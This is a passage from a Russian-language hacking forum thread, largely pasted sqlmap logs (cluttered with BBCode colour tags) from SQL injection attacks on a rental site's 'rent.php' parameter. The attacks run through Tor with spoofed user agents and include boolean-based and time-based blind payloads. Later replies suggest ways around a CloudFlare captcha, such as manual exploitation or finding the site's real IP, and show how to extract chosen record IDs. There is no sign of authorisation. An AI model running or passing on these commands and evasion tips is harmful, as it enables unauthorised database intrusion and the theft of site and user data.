[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]02[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]fetched data logged to text files under[/COLOR][COLOR="#DD0000"]'output\site.org'
[/COLOR][COLOR="#007700"][*][/COLOR][COLOR="#0000BB"]ending[/COLOR][COLOR="#007700"]@[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]02[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]2019[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]09[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]14[/COLOR][COLOR="#007700"]/
[/COLOR][COLOR="#0000BB"]sqlmap[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]py[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]u[/COLOR][COLOR="#DD0000"]"http://site.org/rent.php?country=179&method=get_mobile
_count&operator=4&services=33*&timereset=2"[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]random[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]agent[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]tor[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]tor[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]type[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]SOCKS5[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]risk[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]level[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]5[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]no[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]cast[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]dbs
___
__H__
___ ___[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]']_____ ___ ___ {1.3.9.9#dev}
|_ -| . ["] | .'[/COLOR][COLOR="#007700"]| . |
|[/COLOR][COLOR="#0000BB"]___[/COLOR][COLOR="#007700"]|[/COLOR][COLOR="#0000BB"]_[/COLOR][COLOR="#007700"][.][/COLOR][COLOR="#0000BB"]_[/COLOR][COLOR="#007700"]|[/COLOR][COLOR="#0000BB"]_[/COLOR][COLOR="#007700"]|[/COLOR][COLOR="#0000BB"]_[/COLOR][COLOR="#007700"]|[/COLOR][COLOR="#0000BB"]__[/COLOR][COLOR="#007700"],|[/COLOR][COLOR="#0000BB"]_[/COLOR][COLOR="#007700"]|
|[/COLOR][COLOR="#0000BB"]_[/COLOR][COLOR="#007700"]|[/COLOR][COLOR="#0000BB"]V[/COLOR][COLOR="#007700"]... |[/COLOR][COLOR="#0000BB"]_[/COLOR][COLOR="#007700"]|[/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//sqlmap.org
[/COLOR][COLOR="#007700"][!][/COLOR][COLOR="#0000BB"]legal disclaimer[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]Usage of sqlmap[/COLOR][COLOR="#007700"]for[/COLOR][COLOR="#0000BB"]attacking targets without prior mutual consent is illegal[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]It is the end user[/COLOR][COLOR="#DD0000"]'s responsibility to
obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by
this program
[*] starting @ 13:03:05 /2019-09-14/
[13:03:05] [WARNING] increasing default value for option '[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]time[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]sec[/COLOR][COLOR="#DD0000"]' to 10 because switch '[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]tor[/COLOR][COLOR="#DD0000"]' was provided
[13:03:05] [INFO] setting Tor SOCKS proxy settings
[13:03:06] [INFO] fetched random HTTP User-Agent header value '[/COLOR][COLOR="#0000BB"]Mozilla[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]4.0[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]compatible[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]MSIE 7.0b[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]Windows NT 6.0[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#DD0000"]' from file '[/COLOR][COLOR="#0000BB"]user[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]agents[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]txt[/COLOR][COLOR="#DD0000"]'
custom injection marker ('[/COLOR][COLOR="#007700"]*[/COLOR][COLOR="#DD0000"]') found in option '[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]u[/COLOR][COLOR="#DD0000"]'. Do you want to process it? [Y/n/q] y
[13:03:09] [INFO] resuming back-end DBMS '[/COLOR][COLOR="#0000BB"]mysql[/COLOR][COLOR="#DD0000"]'
[13:03:09] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://site.org:80/rent.php?country=179&method=get_mobile_count&operator=4&services=33 AND 2716=2716&timereset=2
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://site.org:80/rent.php?country=179&method=get_mobile_count&operator=4&services=33 AND (SELECT 1911 FROM (SELECT(SLEEP(
10)))flbR)&timereset=2
---
[13:03:10] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP
back-end DBMS: MySQL >= 5.0.12
[13:03:10] [INFO] fetching database names
[13:03:10] [INFO] fetching number of databases
[13:03:10] [WARNING] running in a single-thread mode. Please consider usage of option '[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]threads[/COLOR][COLOR="#DD0000"]' for faster data retrieval
[13:03:10] [INFO] retrieved:
[13:03:11] [WARNING] it'[/COLOR][COLOR="#0000BB"]s highly recommended to avoid usage of[/COLOR][COLOR="#007700"]switch[/COLOR][COLOR="#DD0000"]'--tor'[/COLOR][COLOR="#007700"]for[/COLOR][COLOR="#0000BB"]time[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]based injections because of inherent high latency tim
e
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]03[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]11[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]WARNING[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]time[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]based comparison requires larger statistical model[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]please wait[/COLOR][COLOR="#007700"]........................... ([/COLOR][COLOR="#0000BB"]done[/COLOR][COLOR="#007700"])
[[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]03[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]37[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]CRITICAL[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]considerable lagging has been detected in connection response[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]s[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#0000BB"]Please[/COLOR][COLOR="#007700"]use as[/COLOR][COLOR="#0000BB"]high value[/COLOR][COLOR="#007700"]for[/COLOR][COLOR="#0000BB"]option[/COLOR][COLOR="#DD0000"]'--time-sec'[/COLOR][COLOR="#007700"]as
[/COLOR][COLOR="#0000BB"]possible[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]e[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]g[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]10[/COLOR][COLOR="#007700"]or[/COLOR][COLOR="#0000BB"]more[/COLOR][COLOR="#007700"])
[[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]03[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]37[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]WARNING[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]it is very important to not stress the network connection during usage of time[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]based payloads to prevent potential disr
uptions
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]03[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]38[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]ERROR[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]unable to retrieve the number of databases
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]03[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]38[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]falling back to current database
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]03[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]38[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]fetching current database
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]03[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]38[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]retrieved[/COLOR][COLOR="#007700"]:
[[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]03[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]40[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]retrieved[/COLOR][COLOR="#007700"]:
[[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]03[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]41[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]CRITICAL[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]unable to retrieve the database names
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]03[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]41[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]fetched data logged to text files under[/COLOR][COLOR="#DD0000"]'output\site.org'
[/COLOR][COLOR="#007700"][*][/COLOR][COLOR="#0000BB"]ending[/COLOR][COLOR="#007700"]@[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]03[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]41[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]2019[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]09[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]14[/COLOR][COLOR="#007700"]/
[/COLOR][COLOR="#0000BB"]sqlmap[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]py[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]u[/COLOR][COLOR="#DD0000"]"http://site.org/rent.php?country=179&method=get_mobile
_count&operator=4&services=33*&timereset=2"[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]random[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]agent[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]tor[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]tor[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]type[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]SOCKS5[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]risk[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]level[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]5[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]hex[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]time[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]sec[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]10[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]dbs
___
__H__
___ ___[/COLOR][COLOR="#007700"][.][/COLOR][COLOR="#0000BB"]_____ ___ ___[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]1.3.9.9[/COLOR][COLOR="#FF8000"]#dev}
[/COLOR][COLOR="#007700"]|[/COLOR][COLOR="#0000BB"]_[/COLOR][COLOR="#007700"]-| . [,] | .[/COLOR][COLOR="#DD0000"]'| . |
|___|_ ['[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]_[/COLOR][COLOR="#007700"]|[/COLOR][COLOR="#0000BB"]_[/COLOR][COLOR="#007700"]|[/COLOR][COLOR="#0000BB"]_[/COLOR][COLOR="#007700"]|[/COLOR][COLOR="#0000BB"]__[/COLOR][COLOR="#007700"],|[/COLOR][COLOR="#0000BB"]_[/COLOR][COLOR="#007700"]|
|[/COLOR][COLOR="#0000BB"]_[/COLOR][COLOR="#007700"]|[/COLOR][COLOR="#0000BB"]V[/COLOR][COLOR="#007700"]... |[/COLOR][COLOR="#0000BB"]_[/COLOR][COLOR="#007700"]|[/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//sqlmap.org
[/COLOR][COLOR="#007700"][!][/COLOR][COLOR="#0000BB"]legal disclaimer[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]Usage of sqlmap[/COLOR][COLOR="#007700"]for[/COLOR][COLOR="#0000BB"]attacking targets without prior mutual consent is illegal[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]It is the end user[/COLOR][COLOR="#DD0000"]'s responsibility to
obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by
this program
[*] starting @ 13:05:03 /2019-09-14/
[13:05:03] [INFO] setting Tor SOCKS proxy settings
[13:05:04] [INFO] fetched random HTTP User-Agent header value '[/COLOR][COLOR="#0000BB"]Mozilla[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]5.0[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]Windows NT 5.1[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]U[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]de[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]rv[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]1.9.1.6[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]Gecko[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]20091201 Firefox[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]3.5.6
Opera 11.00[/COLOR][COLOR="#DD0000"]' from file '[/COLOR][COLOR="#0000BB"]user[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]agents[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]txt[/COLOR][COLOR="#DD0000"]'
custom injection marker ('[/COLOR][COLOR="#007700"]*[/COLOR][COLOR="#DD0000"]') found in option '[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]u[/COLOR][COLOR="#DD0000"]'. Do you want to process it? [Y/n/q] y
[13:05:08] [INFO] resuming back-end DBMS '[/COLOR][COLOR="#0000BB"]mysql[/COLOR][COLOR="#DD0000"]'
[13:05:08] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://site.org:80/rent.php?country=179&method=get_mobile_count&operator=4&services=33 AND 2716=2716&timereset=2
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://site.org:80/rent.php?country=179&method=get_mobile_count&operator=4&services=33 AND (SELECT 1911 FROM (SELECT(SLEEP(
10)))flbR)&timereset=2
---
[13:05:08] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP
back-end DBMS: MySQL >= 5.0.12
[13:05:08] [INFO] fetching database names
[13:05:08] [INFO] fetching number of databases
[13:05:08] [WARNING] running in a single-thread mode. Please consider usage of option '[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]threads[/COLOR][COLOR="#DD0000"]' for faster data retrieval
[13:05:10] [INFO] retrieved:
[13:05:10] [WARNING] it'[/COLOR][COLOR="#0000BB"]s highly recommended to avoid usage of[/COLOR][COLOR="#007700"]switch[/COLOR][COLOR="#DD0000"]'--tor'[/COLOR][COLOR="#007700"]for[/COLOR][COLOR="#0000BB"]time[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]based injections because of inherent high latency tim
e
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]05[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]10[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]WARNING[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]time[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]based comparison requires larger statistical model[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]please wait[/COLOR][COLOR="#007700"].......................... ([/COLOR][COLOR="#0000BB"]done[/COLOR][COLOR="#007700"])
[[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]05[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]24[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]WARNING[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]it is very important to not stress the network connection during usage of time[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]based payloads to prevent potential disr
uptions
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]05[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]25[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]retrieved[/COLOR][COLOR="#007700"]:
[[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]05[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]25[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]ERROR[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]unable to retrieve the number of databases
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]05[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]25[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]falling back to current database
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]05[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]25[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]fetching current database
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]05[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]28[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]retrieved[/COLOR][COLOR="#007700"]:
[[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]05[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]30[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]retrieved[/COLOR][COLOR="#007700"]:
[[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]05[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]30[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]CRITICAL[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]unable to retrieve the database names
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]05[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]30[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]fetched data logged to text files under[/COLOR][COLOR="#DD0000"]'output\site.org'
[/COLOR][COLOR="#007700"][*][/COLOR][COLOR="#0000BB"]ending[/COLOR][COLOR="#007700"]@[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]05[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]30[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]2019[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]09[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]14[/COLOR][COLOR="#007700"]/
[/COLOR][/COLOR]
Попробовал с --dbms=MySQL:
[PHP]
[COLOR="#000000"] sqlmap.py-u"http://site.org/rent.php?country=179&method=get_mobile
_count&operator=4&services=33*&timereset=2"--random-agent--tor--tor-type=SOCKS5--risk=3--level=5--hex--time-sec=15--dbms=MySQL--dbs
___
__H__
___ ___[.]_____ ___ ___{1.3.9.9#dev}
|_-| . [[COLOR="#DD0000"]"] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for atta cking targets without prior mutual consent i s illegal. It is the end user's responsibil ity to
obey all applicable local, state and federal laws. Developers assume no liability and a re not responsible for any misuse or damage caused by
this program
[*] starting @ 15:27:55 /2019-09-14/
[15:27:55] [INFO] setting Tor SOCKS proxy settings
[15:27:56] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_5_8) Appl eWebKit/534.24 (KHTML, lik
e Gecko) Chrome/11.0.696.68 Safari/534.24' from file 'user-agents.txt'
custom injection marker ('*') found in optio n '-u'. Do you want to process it? [Y/n/q] y
[15:27:59] [INFO] testing connection to the target URL
sqlmap resumed the following injection point( s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://site.org:80/rent.php?country=179&method=get_mobile_count&opera tor=4&services=33 AND 6284=6284&timereset=2
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://site.org:80/rent.php?country=179&method=get_mobile_count&opera tor=4&services=33 AND (SELECT 5287 FROM (SELE CT(SLEEP(
15)))FhgH)&timereset=2
---
[15:28:00] [INFO] testing MySQL
[15:28:00] [INFO] confirming MySQL
[15:28:03] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP
back-end DBMS: MySQL >= 5.0.2 (MariaDB fork)
[15:28:03] [WARNING] information_schema not available, back-end DBMS is MySQL |
|
|
|
19.09.2019, 16:12
|
|
Постоянный
Регистрация: 26.10.2016
Сообщений: 438
Провел на форуме:
96779
Репутация:
5
|
|
Сообщение от ex3x1
↑
И снова здравствуйте. Сайт под CloudFlare, с включенной для всех стран гугл каптчей при входе на него. Скульмап не может пройти через капчу, постоянно еррорит:
Код:
[WARNING] potential CAPTCHA protection mechanism detected (CloudFlare)
[WARNING] the web server responded with an HTTP error code (403) which could interfere with the results of the tests
Пробовал подставлять куки с параметром --cookie и ни какого эффекта, так же 403. Тампер "luanginx" бесполезен в этом случае тоже. Есть идеи как пробиться сквозь капчу?
1) крутить руками
2) искать реальный IP сайта
З.Ы если там правильно настроен клауд, то скулю будет сложно раскрутить, паблик методов обхода клауда при sqli я не видел (только старые методы которые уже не катят)
|
|
|
|
19.09.2019, 16:18
|
|
Постоянный
Регистрация: 26.10.2016
Сообщений: 438
Провел на форуме:
96779
Репутация:
5
|
|
Сообщение от ex3x1
↑
WAF отключен у них полностью.
Ну тогда 1е 2 варианта. Если скуля не слепая, то руками крутануть
P.S Мапа в последнее время херово видит скули почему-то. Приходится все чаще делать все в ручном режиме, либо искать другой софт
|
|
|
|
20.09.2019, 00:51
|
|
Познающий
Регистрация: 30.08.2016
Сообщений: 34
Провел на форуме:
12641
Репутация:
0
|
|
заранее сори за глупый вопрос, вот так бывает... )
есть несколько значений id = 2421,12412,41241,4121 которые мне нужны
как с командой --where извлечь только эти ID ?
думал --where=id=2421,12412,41241,4121
вероятно не запятая между значениями нужна ))
|
|
|
|
20.09.2019, 16:59
|
|
Участник форума
Регистрация: 06.07.2015
Сообщений: 240
Провел на форуме:
70303
Репутация:
145
|
|
Сообщение от Estet
↑
заранее сори за глупый вопрос, вот так бывает... )
есть несколько значений id = 2421,12412,41241,4121 которые мне нужны
как с командой --where извлечь только эти ID ?
думал --where=id=2421,12412,41241,4121
вероятно не запятая между значениями нужна ))
Код:
--where "id IN (1,3)"
|
|
|
|
25.09.2019, 11:27
|
|
Новичок
Регистрация: 14.09.2019
Сообщений: 3
Провел на форуме:
1006
Репутация:
0
|
|
Сообщение от ex3x1
↑
И снова здравствуйте. Сайт под CloudFlare, с включенной для всех стран гугл каптчей при входе на него. Скульмап не может пройти через капчу, постоянно еррорит:
Код:
[WARNING] potential CAPTCHA protection mechanism detected (CloudFlare)
[WARNING] the web server responded with an HTTP error code (403) which could interfere with the results of the tests
Пробовал подставлять куки с параметром --cookie и ни какого эффекта, так же 403. Тампер "luanginx" бесполезен в этом случае тоже. Есть идеи как пробиться сквозь капчу?
Попробуй
https://rhinosecuritylabs.com/aws/by...-blocking-aws/
|
|
|
|
26.09.2019, 20:39
|
|
Познающий
Регистрация: 23.05.2008
Сообщений: 84
Провел на форуме:
192463
Репутация:
97
|
|
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
